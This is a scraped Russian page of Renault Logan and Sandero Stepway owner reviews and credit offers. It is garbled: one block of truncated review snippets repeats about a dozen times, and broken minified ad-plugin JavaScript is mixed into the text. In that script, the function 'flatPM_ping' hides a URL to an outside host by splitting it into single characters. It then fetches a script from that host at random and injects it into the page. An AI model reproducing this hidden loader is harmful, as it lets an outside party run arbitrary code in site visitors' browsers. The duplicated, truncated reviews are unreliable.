Содержание
Смотрите, что нашлось на авто.ру: renault sandero stepway 2021 года по цене от 915 000 рублей в ростовской области — более 30 объявлений
- Знакомьтесь! Бюджетный каждодневник и собиратель московских пробок, дальнячник Москва — Рязань, Питер, Осташков (оз. Селигер) и, возможно, «нашиюганашиморя» в скором времени.
- 7 лет без горя!!!! только масло и бензин и расходники ни разу не видел,чтобы горел чекэнж запчасти стоимость на уровне лады! замена расходников просто на «коленке» немного трудности с заменой ламп в ф
- Хорошая машина. Недостатков пока не обнаружил. Все работает. Скорость набирает быстро. Устойчив на дороге. Ездил по грязи, нигде не буксовал. В салоне просторно. Входят два детских кресла на заднее си
- Эксплуатирую 3 года. Хороший, надежный автомобиль. Берите версию на автомате, к «роботу» нужна привычка. Был бы 4WD , цены бы ему не было. Автомобиль очень надежный, подвеска практически неубиваемая.
- Купил с салона, за 2 года проехал 50.000км, никаких проблем во время эксплуатации не возникало, менялись только каждые 10 тыс. км масло, масленные фильтра и один раз поменяли тормозные колодки. Для св
- Очень надежный,не прожорливый авто,неприхотлив и соответствует цена,качество.Свои деньги оправдывает полностью.В городе удобен из за небольших размеров.Хороший клиренс,что в наших российских условиях
- Отличная повозка за свои деньги.
- Расскажу об опыте использования этого автомобиля.
- машина небольшая, резвая, хороший обзор, легко парковаться, идеальная для города для одного-двух человек. иногда можно и четыре-пять человек и забить грузом, но тогда уже и тесно и не такая резвая. пр
Смотрите, что нашлось на авто.ру: renault logan 2021 года по цене от 446 500 рублей в москве — более 486 объявлений
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
§
- Для девушки нет ничего лучше, чем надёжный автомобиль, когда завела и помчала. Из своей практики езды на Renault logan свыше пяти лет, могу смело заявить, что этот автомобиль надёжен, практичен при лю
- Взял случайно, как временный вариант, на пару месяцев. Пришлось ездить полгода.
- Автомобиль трудяга, ничего плохого сказать не могу. Багажник сверху, сзади прицеп, дача, природа, работа. Да это не комфорт, а эконом и сравнивать с авто другого класса не стоит. Дешевое обслуживание.
- За 5 лет только положительные отзывы. Надежность, нормальный комфорт, хорошая работа автодилера и относительно современная начинка (мультимедиа хоть и кнопочная, но приятная на вид с bluetooth и функц
- 5 лет за рулём и ни разу не подвела, машина надёжная, неприхотливая, экономичная, недорогая в обслуживании, мягкая подвеска, проглатывает все выбоины на дороге, двигатель 1.4 литра вполне хватает для
- Рено Логан, появился в нашей семье давно, был ещё в старом кузове, что нравится в этой машине, так это надёжность, по моему мнению надёжнее машины трудно найти, так же нравится доступной запчастей на
- Купил по случаю 3-летний Логан у коллеги, довольно случайной и спонтанной была покупка.
- Это второй Логан в семье, поэтому есть опыт длительной эксплуатации. Отличный авто за свои деньги, ни разу не подводил, дешевый в обслуживании, все запчасти всегда в наличии. Простейшая конструкция и
- Познакомился с этой машинкой абсолютно случайно , наткнулся на авто ру и купил.
Renault logan stepway 2020-2021 — комплектации, цены и технические характеристики
«:’
‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘
‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘
«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘
‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’
Закрыть через ‘ o.how.outgoing.timer_count «
«:’
‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘
‘ c «
«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘
‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(«flat_r_mb»,»zen.yandex»),flat_userVars.referer=»zen.yandex»);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»
«],thead:[1,»
«],tbody:[1,»
«],colgroup:[2,»
«],col:[3,»
«],tr:[2,»
«],td:[3,»
«],th:[3,»
«],_default:[0,»»,»»]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,»<$1>») r[2],l=r[0];l—;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «ng» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’
‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘
‘);var t=e.closest(«.flat__4_video»);-1!==l.indexOf(«go» «oglesyndication»)?t.append(l):flatPM_setHTML(t[0],l),e.find(«.flat__4_video_flex»).one(«click»,function(){n(this).addClass(«show»)})}),n(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=n(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),r=parseInt(o),l=setInterval(function(){a.text(—r),r<=0&&(clearInterval(l),»true»==d?a.parent().replaceWith(‘
‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){n(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&n(«.flat__4_video_flex»).remove()})}
Renault logan stepway city – обзор рено логан степвей сити
2 Программа «Поехали!»
Кредитор — АО «РН Банк», лицензия ЦБ РФ № 170 от 16.12.2021. Валюта — рубль РФ. Указанный ежемесячный платеж рассчитан, исходя из рекомендованной розничной цены 894000 рублей на новые автомобили (далее — «ТС») Renault LOGAN STEPWAY в комплектации Life (Лайф), 1.6 MKП5, 82 л.с. Первоначальный взнос — 556100 руб. Срок кредита 4г. Процентная ставка — 11,9% годовых. Сумма кредита — 387805 руб. Возврат кредита — ежемесячные (аннуитетные) платежи. Последний платеж — 30% стоимости ТС. Оплата страховых премий за счет кредитных средств Банка: по полису КАСКО, по программе Renault Страхование сроком на 1 год в любых страховых компаниях, соответствующих требованиям Банка. Обеспечение по кредиту — залог приобретаемого ТС. Не оферта (ст. 437 ГК РФ). Действует с 01.12.2021 по 07.12.2021 на новые ТС Renault LOGAN STEPWAY 2021 г.в. Подробности – newlogan.ru.
3 Классический кредит
Маркетинговая ставка не является процентной ставкой по кредитному договору и означает выраженный в процентах размер расходов физического лица на приобретение автомобиля (далее — «ТС») за счет кредита при условии снижения стоимости ТС. Разница между маркетинговой ставкой и процентной ставкой компенсируется посредством соразмерного снижения дилером цены на ТС.
Кредитор — АО «РН Банк» (лицензия ЦБ РФ № 170 от 16.12.2021, далее — «Банк»). Валюта кредита — рубль РФ. Первоначальный взнос — от 50% цены приобретаемого ТС; сумма кредита — от 100 000 руб.; срок кредита — 36 мес.; процентная ставка — 11,9% годовых; обеспечение по кредиту — залог приобретаемого ТС; возврат кредита — ежемесячные (аннуитетные) платежи; оплата страховых премий за счет кредитных средств Банка: по полису страхования жизни и здоровья заемщика и полису КАСКО по программе Renault Страхование сроком на 1 год в любых страховых компаниях, соответствующих требованиям Банка. Не оферта (ст. 437 ГК РФ). Действует с 01.12.2021 по 07.12.2021 на новые ТС Renault LOGAN STEPWAY 2021 г.в. Подробности — на newlogan.ru.
